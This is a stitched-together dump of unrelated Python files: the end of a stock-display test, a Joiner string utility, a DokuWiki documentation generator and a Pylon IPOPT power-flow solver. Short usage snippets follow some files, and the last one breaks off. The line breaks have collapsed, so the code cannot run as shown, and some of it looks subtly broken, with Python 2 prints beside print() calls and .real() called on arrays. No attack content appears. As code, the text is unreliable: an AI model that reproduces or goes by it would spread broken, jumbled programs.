self.assertIn( str(product1.get_availability().get('quantity')) + ' ' + product1.default_uom.name, rv.data ) product1.start_displaying_available_quantity = 3 product1.save() # min_warehouse_quantity < quantity with app.test_client() as c: rv = c.get('/product/product-1') # In Stock self.assertIn('In stock', rv.data) product1.min_warehouse_quantity = 11 product1.save() # min_warehouse_quantity > quantity with app.test_client() as c: rv = c.get('/product/product-1') # Out Of Stock self.assertIn('Out of stock', rv.data) product1.min_warehouse_quantity = 0 product1.save() with app.test_client() as c: rv = c.get('/product/product-1') # Only in stock and out of stock cases self.assertIn('In stock', rv.data) product1.min_warehouse_quantity = -1 product1.save() with app.test_client() as c: rv = c.get('/product/product-1') # Always in stock self.assertIn('In stock', rv.data)
""" Defines Joiner class. """ from __future__ import absolute_import from __future__ import print_function from six.moves import map from six.moves import range from six.moves import zip __version__ = '1.0' __author__ = 'Pearu Peterson <pearu.peterson@gmail.com>' __all__ = ['Joiner'] import time class Joiner(object): """ Join a list of string values using specified rules. The following methods are defined: .__init__(*args, **options) - construct Joiner values from args. The options define the rules how the string values are joined together in __str__() method. .add(value, key=None) - add value to a join list. Adding different values with the same key is not allowed. Default key is time.time(). If key exists with equal values then adding a value is skipped. A typical applications for this behaviour would be avoiding redefining the same functions. .copy(mapping=lambda v:v, **new_options) - return a (mapped) copy with new options. .reversed_copy() - return a reversed copy. .__radd__(indent) - return an indented copy. .__iadd__(other) - add other in-place. .__add__(other) - return joined Joiner instances using the LHS options. .__str__() - return a joined string. Examples: >>> print Joiner('a','b',separator=':', prefix='<', suffix='>') <a:b> >>> print Joiner('a','b',separator=':', prefix='<', suffix='>', reverse=True) <b:a> >>> print Joiner('ab','b',separator=':', prefix='<', suffix='>', replace_map={'b':'c'}) <ac:c> >>> print Joiner('a','b',separator=':', prefix='<', suffix='>', use_indent=True, indent_offset=2) <a:b> >>> print Joiner(' a','b',separator=':', prefix='<', suffix='>', use_firstline_indent=True) < a:b> Note that the first value is raw-string: >>> print Joiner(r' a\\nb','c',separator=':', prefix='<', suffix='>', use_firstline_indent=True) < a: b:c> >>> print Joiner(default='hey', prefix='<', suffix='>') <hey> >>> print Joiner(default='hey', prefix='<', suffix='>', skip_prefix_when_empty=True) hey> >>> print Joiner(default='hey', prefix='<', suffix='>', skip_suffix_when_empty=True) <hey >>> print Joiner(default='hey', prefix='<', suffix='>', skip_prefix_suffix_when_single=True) hey >>> print Joiner('hey', prefix='<', suffix='>', skip_prefix_suffix_when_single=True) hey >>> c = Joiner(separator=', ', prefix='"', suffix='"') >>> c.add('hey',1) >>> c.add('hoo',2) >>> print c "hey, hoo" >>> c.add('hey',1) >>> c.add('hey2',1) Traceback (most recent call last): ... 
ValueError: Item 1 exists with different value >>> c2 = Joiner() >>> c2.add('bar') >>> c += c2 >>> print c "hey, hoo, bar" >>> c = Joiner(c_block_indent=True) >>> c += 'line 2' >>> c += 'line 3 {' >>> c += 'line 4 {\\n line 1' >>> c += '}' >>> c += '}' >>> c += 'line 5' >>> print c line 2 line 3 { line 4 { line 1 } } line 5 >>> print '==' + c ==line 2 ==line 3 { ==line 4 { == line 1 ==} ==} ==line 5 >>> c2 = Joiner(c_block_indent=True) >>> c2 += 'LINE 1 {' >>> c2 += c >>> c2 += '}' >>> print c2 LINE 1 { line 2 line 3 { line 4 { line 1 } } line 5 } """ default_options = dict( separator='\n', prefix='', suffix='', skip_prefix_when_empty=False, skip_suffix_when_empty=False, default = '', reverse=False, user_defined_str = None, use_indent = False, use_firstline_indent = False, # implies use_indent, the string values are assumed to contain r'\n' c_block_indent = False, # implies use_indent indent_offset = 0, replace_map = {}, ignore_empty_content = False, skip_prefix_suffix_when_single = False, check_func = None, ) def __init__(self, *args, **options): self.keys = [] self.values = [] self.dict = {} for o in options: if o not in self.default_options: raise KeyError("Unsupported keyword arguments: %r" % (o)) self.options = options.copy() list(map(self.add, args)) @property def use_indent(self): if self.options.get('use_indent'): return True return self.use_firstline_indent or self.c_block_indent def __getattr__(self, name): if name in self.options: return self.options[name] if name in self.default_options: return self.default_options[name] return getattr(super(Joiner, self), name) def add(self, value, key=None): assert isinstance(value, str),repr(type(value)) if key is None: key = time.time() for old, new in list(self.replace_map.items()): value = value.replace(old, new) if key in self.dict: v = self.dict[key] if v != value: raise ValueError("Item %r exists with different value" % (key)) return if not value and self.ignore_empty_content: return self.keys.append(key) self.values.append(value) self.dict[key] = value def __iadd__(self, other): if isinstance(other, type(self)): for key, value in zip(other.keys, other.values): self.add(value, key) elif isinstance(other, list): for item in other: self += item elif isinstance(other, tuple): key, value = other self.add(value, key) else: self.add(other) return self def __radd__(self, indent): cpy = self.copy() for i in range(len(cpy.values)): cpy.values[i] = (indent+cpy.values[i].replace('\n','\n'+indent)) return cpy def __add__(self, other): cpy = self.copy() cpy += other return cpy def __str__(self): if self.user_defined_str is not None: return self.user_defined_str(self) if self.check_func is not None: self.check_func(self) if self.values: l = self.values if self.reverse: l = l[:] l.reverse() if self.use_firstline_indent: # to indent documentation strings new_l = [] for l1 in l: lines = l1.split(r'\n') i = len(lines[0]) - len(lines[0].lstrip()) indent = i * ' ' new_l.append(lines[0]) new_l.extend([indent + l2 for l2 in lines[1:]]) l = new_l if self.c_block_indent: i = 0 new_l = [] for l1 in l: di = l1.count('{') - l1.count('}') i += di if di>0: indent = ' ' * (i-di) else: indent = ' ' * (i) for l2 in l1.split('\n'): new_l.append(indent + l2) l = new_l r = self.separator.join(l) if not (len(self.values)==1 and self.skip_prefix_suffix_when_single): r = self.prefix + r r = r + self.suffix else: r = self.default if not (r and self.skip_prefix_suffix_when_single): if not self.skip_prefix_when_empty: r = self.prefix + r if not self.skip_suffix_when_empty: r 
= r + self.suffix if r and self.use_indent: lines = r.splitlines(True) indent = self.indent_offset * ' ' r = ''.join([indent + line for line in lines]) return r def copy(self, mapping=None, **new_options): options = self.options.copy() options.update(**new_options) cpy = type(self)(**options) if mapping is None: cpy += self else: for key, value in zip(self.keys, self.values): cpy.add(mapping(value), key) return cpy def reverse_copy(self): cpy = self.copy(reverse=not self.reverse) cpy.keys.reverse() cpy.values.reverse() return cpy def _test(): import doctest doctest.testmod() if __name__ == "__main__": _test() print('ok')
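# Quick usage sketch of Joiner, mirroring the doctests above but written with
# print() so it also runs under Python 3: keyed adds are de-duplicated, and
# prefix/separator/suffix control the final rendering.
signature = Joiner(separator=', ', prefix='(', suffix=')')
signature.add('int n', key='n')
signature.add('double* x', key='x')
signature.add('int n', key='n')   # same key and same value: silently skipped
print(signature)                  # -> (int n, double* x)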
#!/usr/bin/python # -*- coding: utf-8 -*- import sys import xml.etree.ElementTree as ET input_list = [] for arg in sys.argv[1:]: input_list.append(arg) if len(input_list) < 1: print("usage: makedoku.py <classes.xml>") sys.exit(0) def validate_tag(elem,tag): if (elem.tag != tag): print("Tag mismatch, expected '"+tag+"', got "+elem.tag); sys.exit(255) class_names=[] classes={} def make_class_list(class_list,columns): f=open("class_list.txt","wb") prev=0 col_max = len(class_list) / columns + 1 print("col max is ", col_max) col_count = 0 row_count = 0 last_initial = "" fit_columns=[] for n in range(0,columns): fit_columns+=[[]] indexers=[] last_initial="" idx=0 for n in class_list: col = idx/col_max if (col>=columns): col=columns-1 fit_columns[col]+=[n] idx+=1 if (n[:1]!=last_initial): indexers+=[n] last_initial=n[:1] row_max=0 for n in range(0,columns): if (len(fit_columns[n])>row_max): row_max=len(fit_columns[n]) for r in range(0,row_max): s="|" for c in range(0,columns): if (r>=len(fit_columns[c])): continue classname = fit_columns[c][r] initial=classname[0] if (classname in indexers): s+="**"+initial+"**|" else: s+=" |" s+="[["+classname.lower()+"|"+classname+"]]|" s+="\n" f.write(s) def dokuize_text(txt): return txt def dokuize_text(text): pos=0 while(True): pos = text.find("[",pos) if (pos==-1): break endq_pos=text.find("]",pos+1) if (endq_pos==-1): break pre_text=text[:pos] post_text=text[endq_pos+1:] tag_text=text[pos+1:endq_pos] if (tag_text in class_names): tag_text="[["+tag_text.lower()+"|"+tag_text+"]]" else: #command cmd=tag_text space_pos=tag_text.find(" ") if (cmd.find("html")==0): cmd=tag_text[:space_pos] param=tag_text[space_pos+1:] tag_text="<"+param+">" elif(cmd.find("method")==0): cmd=tag_text[:space_pos] param=tag_text[space_pos+1:] if (param.find(".")!=-1): class_param,method_param=param.split(".") tag_text="[["+class_param.lower()+"#"+method_param+"|"+class_param+'.'+method_param+"]]" else: tag_text="[[#"+param+"|"+param+"]]" elif (cmd.find("image=")==0): tag_text="{{"+cmd[6:]+"}}" elif (cmd.find("url=")==0): tag_text="[["+cmd[4:]+"|" elif (cmd=="/url"): tag_text="]]>" elif (cmd=="center"): tag_text="" elif (cmd=="/center"): tag_text="" elif (cmd=="br"): tag_text="\\\\\n" elif (cmd=="i" or cmd=="/i"): tag_text="//" elif (cmd=="b" or cmd=="/b"): tag_text="**" elif (cmd=="u" or cmd=="/u"): tag_text="__" else: tag_text="["+tag_text+"]" text=pre_text+tag_text+post_text pos=len(pre_text)+len(tag_text) #tnode = ET.SubElement(parent,"div") #tnode.text=text return text def make_type(t): global class_names if (t in class_names): return "[["+t.lower()+"|"+t+"]]" return t def make_method(f,name,m,declare,event=False): s=" * " ret_type="void" args=list(m) mdata={} mdata["argidx"]=[] for a in args: if (a.tag=="return"): idx=-1 elif (a.tag=="argument"): idx=int(a.attrib["index"]) else: continue mdata["argidx"].append(idx) mdata[idx]=a if (not event): if (-1 in mdata["argidx"]): s+=make_type(mdata[-1].attrib["type"]) else: s+="void" s+=" " if (declare): #span.attrib["class"]="funcdecl" #a=ET.SubElement(span,"a") #a.attrib["name"]=name+"_"+m.attrib["name"] #a.text=name+"::"+m.attrib["name"] s+="**"+m.attrib["name"]+"**" else: s+="[[#"+m.attrib["name"]+"|"+m.attrib["name"]+"]]" s+="**(**" argfound=False for a in mdata["argidx"]: arg=mdata[a] if (a<0): continue if (a>0): s+=", " else: s+=" " s+=make_type(arg.attrib["type"]) if ("name" in arg.attrib): s+=" "+arg.attrib["name"] else: s+=" arg"+str(a) if ("default" in arg.attrib): s+="="+arg.attrib["default"] argfound=True if (argfound): 
s+=" " s+="**)**" if ("qualifiers" in m.attrib): s+=" "+m.attrib["qualifiers"] f.write(s+"\n") def make_doku_class(node): name = node.attrib["name"] f=open(name.lower()+".txt","wb") f.write("====== "+name+" ======\n") if ("inherits" in node.attrib): inh=node.attrib["inherits"].strip() f.write("**Inherits:** [["+inh.lower()+"|"+inh+"]]\\\\\n") if ("category" in node.attrib): f.write("**Category:** "+node.attrib["category"].strip()+"\\\\\n") briefd = node.find("brief_description") if (briefd!=None): f.write("===== Brief Description ======\n") f.write( dokuize_text(briefd.text.strip())+"\n" ) methods = node.find("methods") if(methods!=None and len(list(methods))>0): f.write("===== Member Functions ======\n") for m in list(methods): make_method(f,node.attrib["name"],m,False) events = node.find("signals") if(events!=None and len(list(events))>0): f.write("===== Signals ======\n") for m in list(events): make_method(f,node.attrib["name"],m,True,True) members = node.find("members") if(members!=None and len(list(members))>0): f.write("===== Member Variables ======\n") for c in list(members): s = " * " s+=make_type(c.attrib["type"])+" " s+="**"+c.attrib["name"]+"**" if (c.text.strip()!=""): s+=" - "+c.text.strip() f.write(s+"\n") constants = node.find("constants") if(constants!=None and len(list(constants))>0): f.write("===== Numeric Constants ======\n") for c in list(constants): s = " * " s+="**"+c.attrib["name"]+"**" if ("value" in c.attrib): s+=" = **"+c.attrib["value"]+"**" if (c.text.strip()!=""): s+=" - "+c.text.strip() f.write(s+"\n") descr=node.find("description") if (descr!=None and descr.text.strip()!=""): f.write("===== Description ======\n") f.write(dokuize_text(descr.text.strip())+"\n") methods = node.find("methods") if(methods!=None and len(list(methods))>0): f.write("===== Member Function Description ======\n") for m in list(methods): d=m.find("description") if (d==None or d.text.strip()==""): continue f.write("== "+m.attrib["name"]+" ==\n") make_method(f,node.attrib["name"],m,False) f.write("\\\\\n") f.write(dokuize_text(d.text.strip())) f.write("\n") """ div=ET.Element("div") div.attrib["class"]="class"; a=ET.SubElement(div,"a") a.attrib["name"]=node.attrib["name"] h3=ET.SubElement(a,"h3") h3.attrib["class"]="title class_title" h3.text=node.attrib["name"] briefd = node.find("brief_description") if (briefd!=None): div2=ET.SubElement(div,"div") div2.attrib["class"]="description class_description" div2.text=briefd.text if ("inherits" in node.attrib): ET.SubElement(div,"br") div2=ET.SubElement(div,"div") div2.attrib["class"]="inheritance"; span=ET.SubElement(div2,"span") span.text="Inherits: " make_type(node.attrib["inherits"],div2) if ("category" in node.attrib): ET.SubElement(div,"br") div3=ET.SubElement(div,"div") div3.attrib["class"]="category"; span=ET.SubElement(div3,"span") span.attrib["class"]="category" span.text="Category: " a = ET.SubElement(div3,"a") a.attrib["class"]="category_ref" a.text=node.attrib["category"] catname=a.text if (catname.rfind("/")!=-1): catname=catname[catname.rfind("/"):] catname="CATEGORY_"+catname if (single_page): a.attrib["href"]="#"+catname else: a.attrib["href"]="category.html#"+catname methods = node.find("methods") if(methods!=None and len(list(methods))>0): h4=ET.SubElement(div,"h4") h4.text="Public Methods:" method_table=ET.SubElement(div,"table") method_table.attrib["class"]="method_list"; for m in list(methods): # li = ET.SubElement(div2, "li") method_table.append( make_method_def(node.attrib["name"],m,False) ) events = node.find("signals") 
if(events!=None and len(list(events))>0): h4=ET.SubElement(div,"h4") h4.text="Events:" event_table=ET.SubElement(div,"table") event_table.attrib["class"]="method_list"; for m in list(events): # li = ET.SubElement(div2, "li") event_table.append( make_method_def(node.attrib["name"],m,False,True) ) members = node.find("members") if(members!=None and len(list(members))>0): h4=ET.SubElement(div,"h4") h4.text="Public Variables:" div2=ET.SubElement(div,"div") div2.attrib["class"]="member_list"; for c in list(members): li = ET.SubElement(div2, "li") div3=ET.SubElement(li,"div") div3.attrib["class"]="member"; make_type(c.attrib["type"],div3) span=ET.SubElement(div3,"span") span.attrib["class"]="identifier member_name" span.text=" "+c.attrib["name"]+" " span=ET.SubElement(div3,"span") span.attrib["class"]="member_description" span.text=c.text constants = node.find("constants") if(constants!=None and len(list(constants))>0): h4=ET.SubElement(div,"h4") h4.text="Constants:" div2=ET.SubElement(div,"div") div2.attrib["class"]="constant_list"; for c in list(constants): li = ET.SubElement(div2, "li") div3=ET.SubElement(li,"div") div3.attrib["class"]="constant"; span=ET.SubElement(div3,"span") span.attrib["class"]="identifier constant_name" span.text=c.attrib["name"]+" " if ("value" in c.attrib): span=ET.SubElement(div3,"span") span.attrib["class"]="symbol" span.text="= " span=ET.SubElement(div3,"span") span.attrib["class"]="constant_value" span.text=c.attrib["value"]+" " span=ET.SubElement(div3,"span") span.attrib["class"]="constant_description" span.text=c.text # ET.SubElement(div,"br") descr=node.find("description") if (descr!=None and descr.text.strip()!=""): h4=ET.SubElement(div,"h4") h4.text="Description:" make_text_def(node.attrib["name"],div,descr.text) # div2=ET.SubElement(div,"div") # div2.attrib["class"]="description"; # div2.text=descr.text if(methods!=None or events!=None): h4=ET.SubElement(div,"h4") h4.text="Method Documentation:" iter_list = [] if (methods!=None): iter_list+=list(methods) if (events!=None): iter_list+=list(events) for m in iter_list: descr=m.find("description") if (descr==None or descr.text.strip()==""): continue; div2=ET.SubElement(div,"div") div2.attrib["class"]="method_doc"; div2.append( make_method_def(node.attrib["name"],m,True) ) #anchor = ET.SubElement(div2, "a") #anchor.attrib["name"] = make_text_def(node.attrib["name"],div2,descr.text) #div3=ET.SubElement(div2,"div") #div3.attrib["class"]="description"; #div3.text=descr.text return div """ for file in input_list: tree = ET.parse(file) doc=tree.getroot() if ("version" not in doc.attrib): print("Version missing from 'doc'") sys.exit(255) version=doc.attrib["version"] for c in list(doc): if (c.attrib["name"] in class_names): continue class_names.append(c.attrib["name"]) classes[c.attrib["name"]]=c class_names.sort() make_class_list(class_names,4) for cn in class_names: c=classes[cn] make_doku_class(c)
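# Quick sanity checks for dokuize_text(); the inputs are made-up examples of
# the BBCode-like tags found in the XML class reference.
print(dokuize_text("[i]emphasis[/i] and [b]bold[/b]"))
# -> //emphasis// and **bold**
print(dokuize_text("[method Node2D.rotate]"))
# -> [[node2d#rotate|Node2D.rotate]]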
#------------------------------------------------------------------------------ # Copyright (C) 2007-2010 Richard Lincoln # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #------------------------------------------------------------------------------ """ Defines an OPF solver for Pylon using IPOPT. """ #------------------------------------------------------------------------------ # Imports: #------------------------------------------------------------------------------ import pyipopt from numpy import \ array, polyder, polyval, exp, conj, Inf, ones, r_, zeros, asarray from scipy.sparse import lil_matrix, csr_matrix, hstack, vstack from pylon import REFERENCE from pylon.solver import _Solver, SFLOW, IFLOW, PFLOW #------------------------------------------------------------------------------ # "IPOPFSolver" class: #------------------------------------------------------------------------------ class IPOPFSolver(_Solver): """ Solves AC optimal power flow using IPOPT. """ def __init__(self, om, flow_lim=SFLOW, opt=None): """ Initialises a new IPOPFSolver instance. """ super(IPOPFSolver, self).__init__(om) #: Quantity to limit for branch flow constraints ("S", "P" or "I"). self.flow_lim = flow_lim #: Options for the PIPS. self.opt = {} if opt is None else opt def _ref_bus_angle_constraint(self, buses, Va, xmin, xmax): """ Adds a constraint on the reference bus angles. """ refs = [bus._i for bus in buses if bus.type == REFERENCE] Varefs = array([b.v_angle for b in buses if b.type == REFERENCE]) xmin[Va.i1 - 1 + refs] = Varefs xmax[Va.iN - 1 + refs] = Varefs return xmin, xmax def solve(self): """ Solves AC optimal power flow. """ case = self.om.case base_mva = case.base_mva # TODO: Explain this value. self.opt["cost_mult"] = 1e-4 # Unpack the OPF model. bs, ln, gn, _ = self._unpack_model(self.om) # Compute problem dimensions. ipol, _, nb, nl, _, ny, nxyz = self._dimension_data(bs, ln, gn) # Compute problem dimensions. ng = len(gn) # gpol = [g for g in gn if g.pcost_model == POLYNOMIAL] # Indexes of constrained lines. il = array([i for i,l in enumerate(ln) if 0.0 < l.rate_a < 1e10]) nl2 = len(il) # Linear constraints (l <= A*x <= u). A, l, u = self.om.linear_constraints() # AA, bb = self._linear_constraints(self.om) _, xmin, xmax = self._var_bounds() # Select an interior initial point for interior point solver. x0 = self._initial_interior_point(bs, gn, xmin, xmax, ny) # Build admittance matrices. Ybus, Yf, Yt = case.Y # Optimisation variables. Va = self.om.get_var("Va") Vm = self.om.get_var("Vm") Pg = self.om.get_var("Pg") Qg = self.om.get_var("Qg") # Adds a constraint on the reference bus angles. # xmin, xmax = self._ref_bus_angle_constraint(bs, Va, xmin, xmax) def f_fcn(x, user_data=None): """ Evaluates the objective function. """ p_gen = x[Pg.i1:Pg.iN + 1] # Active generation in p.u. q_gen = x[Qg.i1:Qg.iN + 1] # Reactive generation in p.u. # Polynomial cost of P and Q. 
xx = r_[p_gen, q_gen] * base_mva if len(ipol) > 0: f = sum([g.total_cost(xx[i]) for i,g in enumerate(gn)]) else: f = 0 # Piecewise linear cost of P and Q. if ny: y = self.om.get_var("y") ccost = csr_matrix((ones(ny), (range(y.i1, y.iN + 1), zeros(ny))), shape=(nxyz, 1)).T f = f + ccost * x else: ccost = zeros((1, nxyz)) # TODO: Generalised cost term. return f def df_fcn(x, usr_data=None): """ Calculates gradient of the objective function. """ p_gen = x[Pg.i1:Pg.iN + 1] # Active generation in p.u. q_gen = x[Qg.i1:Qg.iN + 1] # Reactive generation in p.u. xx = r_[p_gen, q_gen] * base_mva if ny > 0: y = self.om.get_var("y") iy = range(y.i1, y.iN + 1) ccost = \ csr_matrix((ones(ny), (iy, zeros(ny))), shape=(nxyz, 1)).T else: ccost = zeros((1, nxyz)) # TODO: Generalised cost term. iPg = range(Pg.i1, Pg.iN + 1) iQg = range(Qg.i1, Qg.iN + 1) # Polynomial cost of P and Q. df_dPgQg = zeros((2 * ng, 1)) # w.r.t p.u. Pg and Qg # df_dPgQg[ipol] = matrix([g.poly_cost(xx[i], 1) for g in gpol]) # for i, g in enumerate(gn): # der = polyder(list(g.p_cost)) # df_dPgQg[i] = polyval(der, xx[i]) * base_mva for i in ipol: df_dPgQg[i] = \ base_mva * polyval(polyder(list(gn[i].p_cost)), xx[i]) df = zeros((nxyz, 1)) df[iPg] = df_dPgQg[:ng] df[iQg] = df_dPgQg[ng:ng + ng] # Piecewise linear cost of P and Q. df = df + ccost.T # TODO: Generalised cost term. return asarray(df).flatten() def g_fcn(x, usr_data=None): """ Evaluates the non-linear constraint values. """ Pgen = x[Pg.i1:Pg.iN + 1] # Active generation in p.u. Qgen = x[Qg.i1:Qg.iN + 1] # Reactive generation in p.u. for i, g in enumerate(gn): g.p = Pgen[i] * base_mva # active generation in MW g.q = Qgen[i] * base_mva # reactive generation in MVAr # Rebuild the net complex bus power injection vector in p.u. Sbus = case.getSbus(bs) Vang = x[Va.i1:Va.iN + 1] Vmag = x[Vm.i1:Vm.iN + 1] V = Vmag * exp(1j * Vang) # Evaluate the power flow equations. mis = V * conj(Ybus * V) - Sbus # Equality constraints (power flow). g = r_[mis.real, # active power mismatch for all buses mis.imag] # reactive power mismatch for all buses # Inequality constraints (branch flow limits). # (line constraint is actually on square of limit) flow_max = array([(l.rate_a / base_mva)**2 for l in ln]) # FIXME: There must be a more elegant method for this. for i, v in enumerate(flow_max): if v == 0.0: flow_max[i] = Inf if self.flow_lim == IFLOW: If = Yf * V It = Yt * V # Branch current limits. h = r_[(If * conj(If)) - flow_max, (If * conj(It)) - flow_max] else: i_fbus = [e.from_bus._i for e in ln] i_tbus = [e.to_bus._i for e in ln] # Complex power injected at "from" bus (p.u.). Sf = V[i_fbus] * conj(Yf * V) # Complex power injected at "to" bus (p.u.). St = V[i_tbus] * conj(Yt * V) if self.flow_lim == PFLOW: # active power limit, P (Pan Wei) # Branch real power limits. h = r_[Sf.real()**2 - flow_max, St.real()**2 - flow_max] elif self.flow_lim == SFLOW: # apparent power limit, |S| # Branch apparent power limits. h = r_[(Sf * conj(Sf)) - flow_max, (St * conj(St)) - flow_max].real else: raise ValueError return r_[g, h] def dg_fcn(x, flag, usr_data=None): """ Calculates the Jacobian matrix. It takes two arguments, the first is the variable x and the second is a Boolean flag. If the flag is true, the function returns a tuple of arrays (row, col) to indicate the sparse structure of the Jacobian matrix. If the flag is false the function returns the values of the Jacobian matrix with length nnzj. 
""" iVa = range(Va.i1, Va.iN + 1) iVm = range(Vm.i1, Vm.iN + 1) iPg = range(Pg.i1, Pg.iN + 1) iQg = range(Qg.i1, Qg.iN + 1) iVaVmPgQg = r_[iVa, iVm, iPg, iQg].T Vang = x[Va.i1:Va.iN + 1] Vmag = x[Vm.i1:Vm.iN + 1] V = Vmag * exp(1j * Vang) # Compute partials of injected bus powers. dSbus_dVm, dSbus_dVa = case.dSbus_dV(Ybus, V) i_gbus = [gen.bus._i for gen in gn] neg_Cg = csr_matrix((-ones(ng), (i_gbus, range(ng))), (nb, ng)) # Transposed Jacobian of the power balance equality constraints. dg = lil_matrix((nxyz, 2 * nb)) blank = csr_matrix((nb, ng)) dg[iVaVmPgQg, :] = vstack([ hstack([dSbus_dVa.real, dSbus_dVm.real, neg_Cg, blank]), hstack([dSbus_dVa.imag, dSbus_dVm.imag, blank, neg_Cg]) ], "csr").T # Compute partials of flows w.r.t V. if self.flow_lim == IFLOW: dFf_dVa, dFf_dVm, dFt_dVa, dFt_dVm, Ff, Ft = \ case.dIbr_dV(Yf, Yt, V) else: dFf_dVa, dFf_dVm, dFt_dVa, dFt_dVm, Ff, Ft = \ case.dSbr_dV(Yf, Yt, V, bs, ln) if self.flow_lim == PFLOW: dFf_dVa = dFf_dVa.real dFf_dVm = dFf_dVm.real dFt_dVa = dFt_dVa.real dFt_dVm = dFt_dVm.real Ff = Ff.real Ft = Ft.real # Squared magnitude of flow (complex power, current or real power). df_dVa, df_dVm, dt_dVa, dt_dVm = \ case.dAbr_dV(dFf_dVa, dFf_dVm, dFt_dVa, dFt_dVm, Ff, Ft) # Construct Jacobian of inequality constraints (branch limits) and # transpose it. dh = lil_matrix((nxyz, 2 * nl)) dh[r_[iVa, iVm].T, :] = vstack([hstack([df_dVa, df_dVm]), hstack([dt_dVa, dt_dVm])], "csr").T J = vstack([dg, dh, A]).tocoo() if flag: return (J.row, J.col) else: return J.data def h_fcn(x, lagrange, obj_factor, flag, usr_data=None): """ Evaluates the Hessian of the Lagrangian. """ neqnln = 2 * nb niqnln = 2 * len(il) # no. of lines with constraints Pgen = x[Pg.i1:Pg.iN + 1] # Active generation in p.u. Qgen = x[Qg.i1:Qg.iN + 1] # Reactive generation in p.u. for i, g in enumerate(gn): g.p = Pgen[i] * base_mva # active generation in MW g.q = Qgen[i] * base_mva # reactive generation in MVAr Vang = x[Va.i1:Va.iN + 1] Vmag = x[Vm.i1:Vm.iN + 1] V = Vmag * exp(1j * Vang) nxtra = nxyz - 2 * nb #------------------------------------------------------------------ # Evaluate d2f. #------------------------------------------------------------------ d2f_dPg2 = lil_matrix((ng, 1)) # w.r.t p.u. Pg d2f_dQg2 = lil_matrix((ng, 1)) # w.r.t p.u. Qg] for i in ipol: d2f_dPg2[i, 0] = polyval(polyder(list(gn[i].p_cost), 2), Pg.v0[i] * base_mva) * base_mva**2 # for i in ipol: # d2f_dQg2[i] = polyval(polyder(list(gn[i].p_cost), 2), # Qg.v0[i] * base_mva) * base_mva**2 i = r_[range(Pg.i1, Pg.iN + 1), range(Qg.i1, Qg.iN + 1)] d2f = csr_matrix((vstack([d2f_dPg2, d2f_dQg2]).toarray().flatten(), (i, i)), shape=(nxyz, nxyz)) # TODO: Generalised cost model. d2f = d2f * self.opt["cost_mult"] #------------------------------------------------------------------ # Evaluate Hessian of power balance constraints. #------------------------------------------------------------------ eqnonlin = lagrange[:neqnln] # nlam = len(lagrange["eqnonlin"]) / 2 nlam = len(eqnonlin) / 2 lamP = eqnonlin[:nlam] lamQ = eqnonlin[nlam:nlam + nlam] Gpaa, Gpav, Gpva, Gpvv = case.d2Sbus_dV2(Ybus, V, lamP) Gqaa, Gqav, Gqva, Gqvv = case.d2Sbus_dV2(Ybus, V, lamQ) d2G = vstack([ hstack([ vstack([hstack([Gpaa, Gpav]), hstack([Gpva, Gpvv])]).real + vstack([hstack([Gqaa, Gqav]), hstack([Gqva, Gqvv])]).imag, csr_matrix((2 * nb, nxtra))]), hstack([ csr_matrix((nxtra, 2 * nb)), csr_matrix((nxtra, nxtra)) ]) ], "csr") #------------------------------------------------------------------ # Evaluate Hessian of flow constraints. 
#------------------------------------------------------------------ ineqnonlin = lagrange[neqnln:neqnln + niqnln] nmu = len(ineqnonlin) / 2 muF = ineqnonlin[:nmu] muT = ineqnonlin[nmu:nmu + nmu] if self.flow_lim == "I": dIf_dVa, dIf_dVm, dIt_dVa, dIt_dVm, If, It = \ case.dIbr_dV(Yf, Yt, V) Hfaa, Hfav, Hfva, Hfvv = \ case.d2AIbr_dV2(dIf_dVa, dIf_dVm, If, Yf, V, muF) Htaa, Htav, Htva, Htvv = \ case.d2AIbr_dV2(dIt_dVa, dIt_dVm, It, Yt, V, muT) else: f = [e.from_bus._i for e in ln] t = [e.to_bus._i for e in ln] # Line-bus connection matrices. Cf = csr_matrix((ones(nl), (range(nl), f)), (nl, nb)) Ct = csr_matrix((ones(nl), (range(nl), t)), (nl, nb)) dSf_dVa, dSf_dVm, dSt_dVa, dSt_dVm, Sf, St = \ case.dSbr_dV(Yf, Yt, V) if self.flow_lim == PFLOW: Hfaa, Hfav, Hfva, Hfvv = \ case.d2ASbr_dV2(dSf_dVa.real(), dSf_dVm.real(), Sf.real(), Cf, Yf, V, muF) Htaa, Htav, Htva, Htvv = \ case.d2ASbr_dV2(dSt_dVa.real(), dSt_dVm.real(), St.real(), Ct, Yt, V, muT) elif self.flow_lim == SFLOW: Hfaa, Hfav, Hfva, Hfvv = \ case.d2ASbr_dV2(dSf_dVa, dSf_dVm, Sf, Cf, Yf, V, muF) Htaa, Htav, Htva, Htvv = \ case.d2ASbr_dV2(dSt_dVa, dSt_dVm, St, Ct, Yt, V, muT) else: raise ValueError d2H = vstack([ hstack([ vstack([hstack([Hfaa, Hfav]), hstack([Hfva, Hfvv])]) + vstack([hstack([Htaa, Htav]), hstack([Htva, Htvv])]), csr_matrix((2 * nb, nxtra)) ]), hstack([ csr_matrix((nxtra, 2 * nb)), csr_matrix((nxtra, nxtra)) ]) ], "csr") H = d2f + d2G + d2H if flag: return (H.row, H.col) else: return H.data n = len(x0) # the number of variables gl = r_[zeros(2 * nb), -Inf * ones(2 * nl2), l] gu = r_[zeros(2 * nb), zeros(2 * nl2), u] m = len(gl) # the number of constraints nnzj = 0 # the number of nonzeros in Jacobian matrix nnzh = 0 # the number of non-zeros in Hessian matrix nlp = pyipopt.create(n, xmin, xmax, m, gl, gu, nnzj, nnzh, f_fcn, df_fcn, g_fcn, dg_fcn, h_fcn) # x, zl, zu, obj = nlp.solve(x0) success = nlp.solve(x0) nlp.close() print "Success:", success print "Solution of the primal variables, x" # print x print "Solution of the bound multipliers, z_L and z_U" # print zl, zu print "Objective value" # print "f(x*) =", obj if __name__ == "__main__": import os import pylon c = pylon.Case.load(os.path.join(os.path.dirname(pylon.__file__), "test", "data", "case6ww.pkl")) s = pylon.OPF(c, dc=False).solve(IPOPFSolver) # EOF -------------------------------------------------------------------------
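# Illustrative check, with made-up numbers, of the squared apparent-power
# branch limit assembled in g_fcn above: a branch is within its rating when
# |Sf|**2 - (rate_a / base_mva)**2 <= 0 in per unit.
from numpy import conj

base_mva = 100.0
rate_a = 250.0                        # branch MVA rating
Sf = 1.8 + 1.2j                       # complex power at the "from" end, p.u.
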